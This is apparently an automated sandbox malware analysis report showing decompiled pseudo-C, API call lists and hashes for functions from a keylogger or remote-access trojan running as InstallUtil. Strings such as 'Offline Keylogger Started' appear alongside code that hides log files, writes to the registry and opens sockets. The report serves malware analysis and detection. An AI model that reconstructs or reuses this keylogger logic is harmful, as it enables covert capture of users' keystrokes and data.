				void* _t66;
				void* _t72;
				void* _t73;
				void* _t81;
				void* _t137;
				signed int _t139;
				signed int _t140;
				void* _t141;
				void* _t142;
				signed int _t143;

				_t129 = __edx;
				_t140 = _t139 & 0xfffffff8;
				_t143 = _t140;
				_t141 = _t140 - 0x460;
				_t81 = __ecx;
				_push(_t133);
				_t137 = __ecx + 4;
				do {
					Sleep(0x1388); // executed
					E00408D9F(_t81, _t129);
					_t129 = 0x4610ec;
					if(E004078C9(_t143) != 0) {
						if(E00409F76() == 0) {
							CreateDirectoryW(E00401EC4(0x46e420), 0); // executed
						}
						_t131 = _t81 + 0x60;
						_t32 = GetFileAttributesW(E00401EC4(_t81 + 0x60)); // executed
						_t146 = _t32 & 0x00000002;
						if((_t32 & 0x00000002) != 0) {
							SetFileAttributesW(E00401EC4(_t131), 0x80); // executed
						}
						_t34 = E00401F6B(E00401E25(0x46e600, _t129, _t137, _t146, 0x12));
						_t147 =  *_t34;
						if( *_t34 != 0) {
							E0040209F(_t81,  &_v1124);
							_t36 = E0040243C();
							E00405AE8( &_v1028, E00401F6B(0x46e5e8), _t36);
							_t40 = PathFileExistsW(E00401EC4(_t131)); // executed
							__eflags = _t40;
							if(_t40 != 0) {
								E0040209F(_t81,  &_v1100);
								E00401EC4(_t131);
								_t129 =  &_v1100;
								_t64 = E004189A5( &_v1100);
								__eflags = _t64;
								if(_t64 != 0) {
									_t66 = E0040243C();
									E00401FA2( &_v1136, _t129, _t133, E00405C09(_t81,  &_v1028,  &_v1100,  &_v1076, E00401F6B( &_v1100), _t66));
									E00401F98();
								}
								E00401F98();
							}
							_t42 = E0040243C() + _t41;
							__eflags = E0040243C() + _t41;
							L00403336(E00402077(_t81,  &_v1076, _t129, _t137, __eflags, E00401EC4(_t137), _t42));
							E00401F98();
							_t47 = E0040243C();
							E00405C09(_t81,  &_v1040, _t129,  &_v1064, E00401F6B( &_v1136), _t47);
							_t51 = E00401EC4(_t131);
							_t142 = _t141 - 0x18;
							_t133 = _t51;
							E004020B6(_t81, _t142, _t129, __eflags,  &_v1076);
							E00418A12(_t51);
							_t141 = _t142 + 0x18;
							E00401F98();
							E00401F98();
						} else {
							_t72 = E00401EC4(_t131);
							_t73 = E0040243C();
							_t135 = _t73;
							_t133 = _t73 + _t135;
							E00401EC4(_t137);
							_t129 = _t73 + _t135;
							E00418911(_t73 + _t135, _t72, 1);
						}
						L00409F8A(_t81, _t137, _t129, 0x4610ec);
						if( *((char*)(E00401F6B(E00401E25(0x46e600, _t129, _t137, _t147, 0x13)))) != 0) {
							SetFileAttributesW(E00401EC4(_t131), 6); // executed
						}
					}
				} while ( *((char*)(_t81 + 0x49)) != 0);
				return 0;
			}

0x00408e50
0x00408e53
0x00408e53
0x00408e56
0x00408e5e
0x00408e60
0x00408e62
0x00408e65
0x00408e6a
0x00408e72
0x00408e77
0x00408e85
0x00408e97
0x00408ea6
0x00408ea6
0x00408eac
0x00408eb7
0x00408ebd
0x00408ebf
0x00408ece
0x00408ece
0x00408ee2
0x00408ee7
0x00408eea
0x00408f1c
0x00408f26
0x00408f3b
0x00408f48
0x00408f4e
0x00408f50
0x00408f56
0x00408f5d
0x00408f62
0x00408f68
0x00408f6d
0x00408f6f
0x00408f75
0x00408f98
0x00408fa1
0x00408fa1
0x00408faa
0x00408faa
0x00408fb6
0x00408fb6
0x00408fcf
0x00408fd8
0x00408fe1
0x00408ffa
0x00409001
0x00409006
0x00409009
0x00409012
0x00409019
0x0040901e
0x00409025
0x0040902e
0x00408eec
0x00408ef0
0x00408ef8
0x00408efd
0x00408f01
0x00408f03
0x00408f08
0x00408f0c
0x00408f12
0x0040903a
0x00409055
0x00409061
0x00409061
0x00409055
0x00409067
0x0040907a

APIs

Sleep.KERNELBASE(00001388), ref: 00408E6A

Part of subcall function 00408D9F: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00408E77), ref: 00408DD5
Part of subcall function 00408D9F: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00408E77), ref: 00408DE4
Part of subcall function 00408D9F: Sleep.KERNEL32(00002710,?,?,?,00408E77), ref: 00408E11
Part of subcall function 00408D9F: CloseHandle.KERNEL32(00000000,?,?,?,00408E77), ref: 00408E18

CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 00408EA6
GetFileAttributesW.KERNELBASE(00000000), ref: 00408EB7
SetFileAttributesW.KERNELBASE(00000000,00000080), ref: 00408ECE
PathFileExistsW.KERNELBASE(00000000,00000000,00000000,00000012), ref: 00408F48

Part of subcall function 004189A5: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00408F6D), ref: 004189BE

SetFileAttributesW.KERNELBASE(00000000,00000006,00000013,004610EC), ref: 00409061

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
String ID:
API String ID: 3795512280-0
Opcode ID: 9b9c6716843d478f59f79ffc508c013b3a1489281b0fe0909512c3ecac0a7143
Instruction ID: 5c635a6cfe2eadd611e1a665c3ef29f93fcc060bfe6103269511a7b738c47b9f
Opcode Fuzzy Hash: 9b9c6716843d478f59f79ffc508c013b3a1489281b0fe0909512c3ecac0a7143
Instruction Fuzzy Hash: A9516C716042415ACB04BB72CD66ABF779A9B90349F00093FB542B72E3EF3D9D05869A

Uniqueness

Uniqueness Score: -1.00%

Function 00408935 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 70
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E00408935(void* __ecx, char* __edx, char _a4) {
				char _v28;
				char _v32;
				void* _v56;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t21;
				void* _t39;
				void* _t41;
				signed int _t42;
				void* _t44;

				_t33 = __edx;
				_t44 = (_t42 & 0xfffffff8) - 0x1c;
				_push(_t21);
				_t39 = __ecx;
				 *((char*)(__ecx + 0x49)) = 1;
				E00409F8F(__ecx + 0x60,  &_a4);
				_t48 =  *0x46c9c4 - 0x32;
				_t35 = "Offline Keylogger Started";
				if( *0x46c9c4 != 0x32) {
					E00402053(_t21,  &_v28, __edx, _t41, "Offline Keylogger Started");
					_t44 = _t44 - 0x18;
					_t33 =  &_v32;
					E00418385(_t44,  &_v32);
					E004097F2(_t21, _t39, _t48);
					E00401F98();
				}
				_t45 = _t44 - 0x18;
				E00402053(_t21, _t44 - 0x18, _t33, _t41, _t35);
				E00402053(_t21, _t45 - 0x18, _t33, _t41, "i");
				E00417D02(_t21, _t35);
				CreateThread(0, 0, E00408A37, _t39, 0, 0); // executed
				if( *_t39 == 0) {
					CreateThread(0, 0, E00408A21, _t39, 0, 0); // executed
				}
				CreateThread(0, 0, E00408A43, _t39, 0, 0); // executed
				return E00401EC9();
			}

0x00408935
0x0040893b
0x00408941
0x00408943
0x0040894a
0x0040894e
0x00408953
0x0040895a
0x0040895f
0x00408966
0x0040896b
0x0040896e
0x00408974
0x0040897b
0x00408984
0x00408984
0x00408989
0x0040898f
0x0040899e
0x004089a3
0x004089bd
0x004089c1
0x004089cd
0x004089cd
0x004089d9
0x004089e9

APIs

CreateThread.KERNELBASE(00000000,00000000,00408A37,?,00000000,00000000), ref: 004089BD
CreateThread.KERNELBASE(00000000,00000000,Function_00008A21,?,00000000,00000000), ref: 004089CD
CreateThread.KERNELBASE(00000000,00000000,Function_00008A43,?,00000000,00000000), ref: 004089D9

Part of subcall function 004097F2: GetLocalTime.KERNEL32(?,?,00000000), ref: 00409800
Part of subcall function 004097F2: wsprintfW.USER32 ref: 00409881

Strings

Cv, xrefs: 004089A8
Offline Keylogger Started, xrefs: 0040895A, 00408961, 0040898E

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: CreateThread$LocalTimewsprintf
String ID: Offline Keylogger Started$Cv
API String ID: 465354869-172359471
Opcode ID: 74249c497cd070250b76d4e8322ec341e6c4761e3e3defb514e937134a00d100
Instruction ID: a66275cd029605e2d6c4c23146f9b35dac49eccb0e3f577f27fac9660554f43d
Opcode Fuzzy Hash: 74249c497cd070250b76d4e8322ec341e6c4761e3e3defb514e937134a00d100
Instruction Fuzzy Hash: 7B1198E12002183ED210BB669D86DBF7A5CDA8139CB44057FF881221C3DEB85D05C6FA

Uniqueness

Uniqueness Score: -1.00%

Function 00418911 Relevance: 7.6, APIs: 5, Instructions: 67
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00418911(long __edx, WCHAR* _a4, long _a8) {
				long _v4;
				long _t8;
				long _t9;
				void* _t10;
				int _t12;
				struct _OVERLAPPED* _t19;
				void* _t20;
				long _t21;
				long _t23;
				void* _t24;
				void* _t25;

				_t19 = 0;
				_t25 = _t20;
				_t23 = __edx;
				_t8 = _a8;
				if(_t8 == 0) {
					_t9 = 0x40000000;
					_t21 = 2;
				} else {
					if(_t8 != 1) {
						_t9 = _a8;
						_t21 = _a8;
					} else {
						_t9 = 4;
						_t21 = _t9;
					}
				}
				_t10 = CreateFileW(_a4, _t9, _t19, _t19, _t21, 0x80, _t19); // executed
				_t24 = _t10;
				if(_t24 != 0xffffffff) {
					if(_a8 != 1 || SetFilePointer(_t24, _t19, _t19, 2) != 0xffffffff) {
						_t12 = WriteFile(_t24, _t25, _t23,  &_v4, _t19); // executed
						if(_t12 != 0) {
							_t19 = 1;
						}
						FindCloseChangeNotification(_t24); // executed
						return _t19;
					} else {
						CloseHandle(_t24);
						goto L6;
					}
				} else {
					L6:
					return 0;
				}
			}

0x00418919
0x0041891b
0x0041891e
0x00418920
0x00418922
0x0041893c
0x00418941
0x00418924
0x00418927
0x00418930
0x00418934
0x00418929
0x0041892b
0x0041892c
0x0041892c
0x00418927
0x00418950
0x00418956
0x0041895b
0x00418966
0x0041898a
0x00418992
0x00418994
0x00418994
0x00418997
0x00000000
0x00418978
0x00418979
0x00000000
0x00418979
0x0041895d
0x0041895d
0x00000000
0x0041895d

APIs

CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,00418A34,00000000,00000000,00000000), ref: 00418950
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041896D
CloseHandle.KERNEL32(00000000), ref: 00418979
WriteFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 0041898A
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00418997

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: File$Close$ChangeCreateFindHandleNotificationPointerWrite
String ID:
API String ID: 1087594267-0
Opcode ID: 9f4340a4c9e5937eada5f5b875228784ce05a6c6d5cecaa29566e016291d535e
Instruction ID: 80e4ba22bf89f8ee18f13056a795aaacedb7bc5eca07055e70640f5838e5d001
Opcode Fuzzy Hash: 9f4340a4c9e5937eada5f5b875228784ce05a6c6d5cecaa29566e016291d535e
Instruction Fuzzy Hash: 8F1108F12252157FE6104A649C88EFB739CEB823B9F10062EF651D62D0CA25CC81863B

Uniqueness

Uniqueness Score: -1.00%

Function 00410CE2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E00410CE2(void* __ecx, char* __edx, char* _a4, char _a8, int _a32) {
				void* _v8;
				long _t12;
				int _t15;
				long _t17;
				signed int _t19;
				signed int _t20;

				_push(__ecx);
				_push(_t19);
				_t12 = RegCreateKeyA(0x80000001, __edx,  &_v8); // executed
				if(_t12 != 0) {
					_t20 = 0;
				} else {
					_t15 = E0040243C();
					_t17 = RegSetValueExA(_v8, _a4, 0, _a32, E00401F6B( &_a8), _t15); // executed
					RegCloseKey(_v8); // executed
					_t20 = _t19 & 0xffffff00 | _t17 == 0x00000000;
				}
				E00401F98();
				return _t20;
			}

0x00410ce5
0x00410ce6
0x00410cf1
0x00410cf9
0x00410d32
0x00410cfb
0x00410cff
0x00410d19
0x00410d24
0x00410d2d
0x00410d2d
0x00410d37
0x00410d42

APIs

RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 00410CF1
RegSetValueExA.KERNELBASE(?,00462000,00000000,?,00000000,00000000,0046E5A0,?,pth_unenc,0040D31C,00462000,3.5.1 Pro), ref: 00410D19
RegCloseKey.KERNELBASE(?,?,pth_unenc,0040D31C,00462000,3.5.1 Pro), ref: 00410D24

Strings

pth_unenc, xrefs: 00410CE2

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: CloseCreateValue
String ID: pth_unenc
API String ID: 1818849710-4028850238
Opcode ID: 21ad348f6b2cdecdc11739af5a3116a30b9da9c80141f51c2204706795f3566d
Instruction ID: e5fecbdd269f249bfb6c5e539c51175ac4a9768262394a6b8c1c59c519a6a8fd
Opcode Fuzzy Hash: 21ad348f6b2cdecdc11739af5a3116a30b9da9c80141f51c2204706795f3566d
Instruction Fuzzy Hash: 00F0F072400108BFCB00AFA0EC05EEF372CEF04755F20812ABD05AA0A2EB35AE40DB94

Uniqueness

Uniqueness Score: -1.00%

Function 00410AC0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00410AC0(char* __edx, char* _a4, char* _a8) {
				void* _v8;
				int _v12;
				int _v16;
				int _t12;
				long _t14;
				long _t18;
				signed int _t19;

				_t12 = 4;
				_v12 = _t12;
				_v16 = _t12;
				_t14 = RegOpenKeyExA(0x80000001, __edx, 0, 0x20019,  &_v8); // executed
				if(_t14 != 0) {
					return 0;
				}
				_t18 = RegQueryValueExA(_v8, _a4, 0,  &_v16, _a8,  &_v12); // executed
				_t19 = RegCloseKey(_v8); // executed
				return _t19 & 0xffffff00 | _t18 == 0x00000000;
			}

0x00410ac8
0x00410ac9
0x00410acc
0x00410ae0
0x00410ae8
0x00000000
0x00410b17
0x00410afe
0x00410b09
0x00000000

APIs

RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 00410AE0
RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,0046E5A0), ref: 00410AFE
RegCloseKey.KERNELBASE(?), ref: 00410B09

Strings

pth_unenc, xrefs: 00410AC0

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: pth_unenc
API String ID: 3677997916-4028850238
Opcode ID: 7053b8e8240af954fd7df57cdafcc7f75240cb4fb625a4bc86cd69d0a0dfcf9e
Instruction ID: f4496cc878273702dfdc3da5aaa854e1b50d141723799327ce4bada9fc694977
Opcode Fuzzy Hash: 7053b8e8240af954fd7df57cdafcc7f75240cb4fb625a4bc86cd69d0a0dfcf9e
Instruction Fuzzy Hash: 48F01D7690420CFFDF109FE0AC05FEE7BBCEB44B15F2080A5BA05EA191D2719A949B94

Uniqueness

Uniqueness Score: -1.00%

Function 004189A5 Relevance: 6.0, APIs: 4, Instructions: 50
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004189A5(void* __edx) {
				long _v12;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __ebp;
				void* _t3;
				int _t8;
				struct _OVERLAPPED* _t12;
				WCHAR* _t13;
				void* _t17;
				long _t19;
				void* _t21;

				_t12 = 0;
				_t21 = __edx;
				_t3 = CreateFileW(_t13, 0x80000000, 3, 0, 3, 0x80, 0); // executed
				_t17 = _t3;
				if(_t17 != 0xffffffff) {
					_t19 = GetFileSize(_t17, 0);
					E0040240E(0, _t21, _t17, _t21, _t19, 0);
					_v12 = 0;
					_t8 = ReadFile(_t17, E00401F6B(_t21), _t19,  &_v12, 0); // executed
					if(_t8 != 0) {
						_t12 = 1;
					}
					FindCloseChangeNotification(_t17); // executed
					return _t12;
				}
				return 0;
			}

0x004189a9
0x004189ab
0x004189be
0x004189c4
0x004189c9
0x004189d8
0x004189de
0x004189e8
0x004189f7
0x00418a00
0x00418a02
0x00418a02
0x00418a05
0x00000000
0x00418a0b
0x00000000

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00408F6D), ref: 004189BE
GetFileSize.KERNEL32(00000000,00000000), ref: 004189D2
ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004189F7
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00418A05

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: File$ChangeCloseCreateFindNotificationReadSize
String ID:
API String ID: 2135649906-0
Opcode ID: 87118bf7b8f2c9ea4181c262c12cf33c2244f8cf286b6956f58745756308a35a
Instruction ID: e6ae1e87f009a8b267ac87045a22280881a06ba37f39a171122354ec6aca05bc
Opcode Fuzzy Hash: 87118bf7b8f2c9ea4181c262c12cf33c2244f8cf286b6956f58745756308a35a
Instruction Fuzzy Hash: 24F0C2B12023187FE6101B21AC84EBF366CEBC67E9F00023EF801A22C1CB658C45417A

Uniqueness

Uniqueness Score: -1.00%

Function 0044B14E Relevance: 4.5, APIs: 3, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0044B14E(void* __ecx) {
				void* _t6;
				void* _t14;
				void* _t18;
				WCHAR* _t19;

				_t14 = __ecx;
				_t19 = GetEnvironmentStringsW();
				if(_t19 != 0) {
					_t12 = (E0044B094(_t19) - _t19 >> 1) + (E0044B094(_t19) - _t19 >> 1);
					_t6 = E004421F7(_t14, (E0044B094(_t19) - _t19 >> 1) + (E0044B094(_t19) - _t19 >> 1)); // executed
					_t18 = _t6;
					if(_t18 != 0) {
						E00433220(_t18, _t19, _t12);
					}
					E004427C2(0);
					FreeEnvironmentStringsW(_t19);
				} else {
					_t18 = 0;
				}
				return _t18;
			}

0x0044b14e
0x0044b158
0x0044b15c
0x0044b16d
0x0044b171
0x0044b176
0x0044b17c
0x0044b181
0x0044b186
0x0044b18b
0x0044b192
0x0044b15e
0x0044b15e
0x0044b15e
0x0044b19d

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0044B152
_free.LIBCMT ref: 0044B18B
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044B192

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: EnvironmentStrings$Free_free
String ID:
API String ID: 2716640707-0
Opcode ID: 4f46137869c3cae6b4285890766a5a5dae1d4d0c0190a0bdc3000a0ecb47cd6c
Instruction ID: 38596851c3e658fe0a0f91bf76ce37377600a257cca0034f253913d0fcd42bdf
Opcode Fuzzy Hash: 4f46137869c3cae6b4285890766a5a5dae1d4d0c0190a0bdc3000a0ecb47cd6c
Instruction Fuzzy Hash: B8E09B37104A106BF321263B7C59D6F2A19DFD17FAB55012BF54886142EF1CCD4640F9

Uniqueness

Uniqueness Score: -1.00%

Function 00410B1D Relevance: 4.5, APIs: 3, Instructions: 37
registryCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00410B1D(void* __ecx, void* __edx, char* _a4, char* _a8) {
				void* _v8;
				int _v12;
				char _v1036;
				void* __ebp;
				long _t11;
				void* _t19;
				void* _t23;
				void* _t24;

				_t22 = __edx;
				_v12 = 0x400;
				_t23 = __ecx;
				_t11 = RegOpenKeyExA(__edx, _a4, 0, 0x20019,  &_v8); // executed
				if(_t11 != 0) {
					_push(0x461084);
				} else {
					RegQueryValueExA(_v8, _a8, 0, 0,  &_v1036,  &_v12); // executed
					RegCloseKey(_v8);
					_push( &_v1036);
				}
				E00402053(_t19, _t23, _t22, _t24);
				return _t23;
			}

0x00410b1d
0x00410b2a
0x00410b3c
0x00410b3f
0x00410b47
0x00410b76
0x00410b49
0x00410b5e
0x00410b67
0x00410b73
0x00410b73
0x00410b7d
0x00410b88

APIs

RegOpenKeyExA.KERNELBASE(80000002,00000400,00000000,00020019,?), ref: 00410B3F
RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00410B5E
RegCloseKey.ADVAPI32(?), ref: 00410B67

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 082bb0e7f3251a25b6249291ddec227c05369effdcea8086b3da4da2b9e09f8e
Instruction ID: 4d432c2b4f5be1bb2a93fa507f3f7109f49a99b8228294946a1cd537aea9961c
Opcode Fuzzy Hash: 082bb0e7f3251a25b6249291ddec227c05369effdcea8086b3da4da2b9e09f8e
Instruction Fuzzy Hash: 51F0C27560421CBBDF109B90DC45FDE777CEB04B09F2040A6BB05B61D0D6B0AA819B98

Uniqueness

Uniqueness Score: -1.00%

Function 0041925A Relevance: 3.0, APIs: 2, Instructions: 42
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041925A(void* __ecx, long __edx) {
				char _v8;
				char _v32;
				void* __ebp;
				long _t10;
				void* _t18;
				void* _t27;
				void* _t29;

				_t26 = __edx;
				_t27 = __ecx;
				E0040209F(_t18,  &_v32);
				_t10 = FormatMessageA(0x1100, 0, __edx, 0x400,  &_v8, 0, 0); // executed
				if(_t10 != 0) {
					L00405A7D(_t18,  &_v32, _t26, _v8);
					LocalFree(_v8);
					E00402015(_t18, _t27, _t29, __eflags,  &_v32);
				} else {
					E00402053(_t18, _t27, _t26, _t29, 0x461084);
				}
				E00401F98();
				return _t27;
			}

0x0041925a
0x00419262
0x00419269
0x00419282
0x0041928a
0x004192a0
0x004192a8
0x004192b4
0x0041928c
0x00419293
0x00419293
0x004192bc
0x004192c8

APIs

FormatMessageA.KERNELBASE(00001100,00000000,00000000,00000400,00404A17,00000000,00000000,0046E278,0046E278), ref: 00419282
LocalFree.KERNEL32(00404A17,00404A17,?,?,?,?,?,?,?,00404A17,?,004052E2,?,Keylogger initialization failure: error ,?,00408AC8), ref: 004192A8

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: FormatFreeLocalMessage
String ID:
API String ID: 1427518018-0
Opcode ID: 11d62433a0bf99988e24683bbf5812a75fdec783ca450b51d063bc476012dcbd
Instruction ID: 9a551bf274496a70fde5c61f4cb1b6a3b2706f8264e1f68fb6857697852ec5c6
Opcode Fuzzy Hash: 11d62433a0bf99988e24683bbf5812a75fdec783ca450b51d063bc476012dcbd
Instruction Fuzzy Hash: 6BF0A435A00209BACF08A7A6DC4ADFF776CDB85309B10407FB606B21D1EAB85D45C659

Uniqueness

Uniqueness Score: -1.00%

Function 00404804 Relevance: 3.0, APIs: 2, Instructions: 40
networkCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00404804(char* __ecx) {
				intOrPtr _t14;
				char _t16;
				char* _t22;

				_t22 = __ecx;
				if( *0x46daab != 0 || E00404875() != 0) {
					_t14 =  *0x46dacc; // 0x0
					__imp__#23( *((intOrPtr*)(_t14 + 4)), 1, 6); // executed
					 *((intOrPtr*)(_t22 + 4)) = _t14;
					if(_t14 == 0xffffffff) {
						goto L2;
					} else {
						_t16 =  *0x46dad4; // 0x0
						 *((char*)(_t22 + 0x5c)) = 0;
						 *((intOrPtr*)(_t22 + 0x60)) = 0;
						 *((intOrPtr*)(_t22 + 0x58)) = 0x3e8;
						 *((char*)(_t22 + 0x7d)) = 0;
						 *((char*)(_t22 + 1)) = _t16;
						 *((intOrPtr*)(_t22 + 0x4c)) = 0;
						 *((intOrPtr*)(_t22 + 0x50)) = 0;
						 *((intOrPtr*)(_t22 + 0x68)) = 0;
						 *((intOrPtr*)(_t22 + 0x70)) = 0;
						 *((intOrPtr*)(_t22 + 0x6c)) = 0;
						 *((intOrPtr*)(_t22 + 0x68)) = CreateEventW(0, 0, 1, 0);
						 *_t22 = 1;
						return 1;
					}
				} else {
					L2:
					return 0;
				}
			}

0x0040480c
0x0040480e
0x0040481d
0x00404829
0x0040482f
0x00404835
0x00000000
0x00404837
0x00404837
0x00404843
0x00404846
0x00404849
0x00404850
0x00404853
0x00404856
0x00404859
0x0040485c
0x0040485f
0x00404862
0x0040486b
0x00404870
0x00404874
0x00404874
0x00404819
0x00404819
0x0040481c
0x0040481c

APIs

socket.WS2_32(?,00000001,00000006), ref: 00404829
CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,00000000,?,00405350,?,?,00000000,?,004052E2,?,Keylogger initialization failure: error ), ref: 00404865

Part of subcall function 00404875: WSAStartup.WS2_32(00000202,00000000), ref: 0040488A

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: CreateEventStartupsocket
String ID:
API String ID: 1953588214-0
Opcode ID: 6b9e4f11f9d9a1ba16f3fe169b8234e6e02a1ff1852ce907c54f3e708a03f3c5
Instruction ID: 7b1813722303b8b163597c8ab081666278b13104996b4cc80dfd03e261cc98a6
Opcode Fuzzy Hash: 6b9e4f11f9d9a1ba16f3fe169b8234e6e02a1ff1852ce907c54f3e708a03f3c5
Instruction Fuzzy Hash: F501B1B18087809FD7349F29A8447867FE0AB55314F048E6FF1D697BA1D3B0A481CF18

Uniqueness

Uniqueness Score: -1.00%

Function 0043F86B Relevance: 3.0, APIs: 2, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0043F86B(void* __ebx, void* __ecx) {
				void* _t2;
				intOrPtr _t3;
				signed int _t15;
				signed int _t16;

				if( *0x46d4d0 == 0) {
					_push(_t15);
					E0044AD49(__ecx); // executed
					_t2 = E0044B0CB(); // executed
					_t19 = _t2;
					if(_t2 != 0) {
						_t3 = E0043F918(__ebx, _t19);
						if(_t3 != 0) {
							 *0x46d4dc = _t3;
							E00438431(0x46d4d0, _t3);
							_t16 = 0;
						} else {
							_t16 = _t15 | 0xffffffff;
						}
						E004427C2(0);
					} else {
						_t16 = _t15 | 0xffffffff;
					}
					E004427C2(_t19);
					return _t16;
				} else {
					return 0;
				}
			}

0x0043f872
0x0043f878
0x0043f879
0x0043f87e
0x0043f883
0x0043f887
0x0043f88f
0x0043f897
0x0043f8a4
0x0043f8a9
0x0043f8ae
0x0043f899
0x0043f899
0x0043f899
0x0043f8b2
0x0043f889
0x0043f889
0x0043f889
0x0043f8b9
0x0043f8c3
0x0043f874
0x0043f876
0x0043f876

APIs

_free.LIBCMT ref: 0043F8B9

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: cd27336823bea05ba0d54b761362d8818fe01a616471ef142d915a0f2288e803
Instruction ID: ddba7f80a1c3860314320511434d058b5469eca7fc01f139c127d34023271ce3
Opcode Fuzzy Hash: cd27336823bea05ba0d54b761362d8818fe01a616471ef142d915a0f2288e803
Instruction Fuzzy Hash: 93E03922F4592121B22D323B6C06B6B05459F9937AF51123BF9218A1D1EFAC8C4A52AF

Uniqueness

Uniqueness Score: -1.00%

Function 0040161E Relevance: 3.0, APIs: 2, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E0040161E(signed int _a4, signed int _a8, char _a12) {
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				void* __esi;
				signed int _t59;
				signed int _t60;
				signed int _t62;
				signed int _t71;
				intOrPtr _t79;
				signed int _t81;
				signed int _t84;
				signed int _t85;
				signed int _t86;
				intOrPtr _t87;
				signed int _t88;
				signed int _t90;
				intOrPtr _t91;
				intOrPtr _t97;
				intOrPtr _t98;
				intOrPtr* _t100;
				signed int _t101;
				signed int _t102;
				signed int _t104;
				intOrPtr _t112;
				signed int _t120;
				intOrPtr* _t122;
				signed int _t123;
				signed int _t125;
				signed int _t126;
				void* _t127;
				void* _t133;
				void* _t134;
				void* _t137;
				void* _t138;
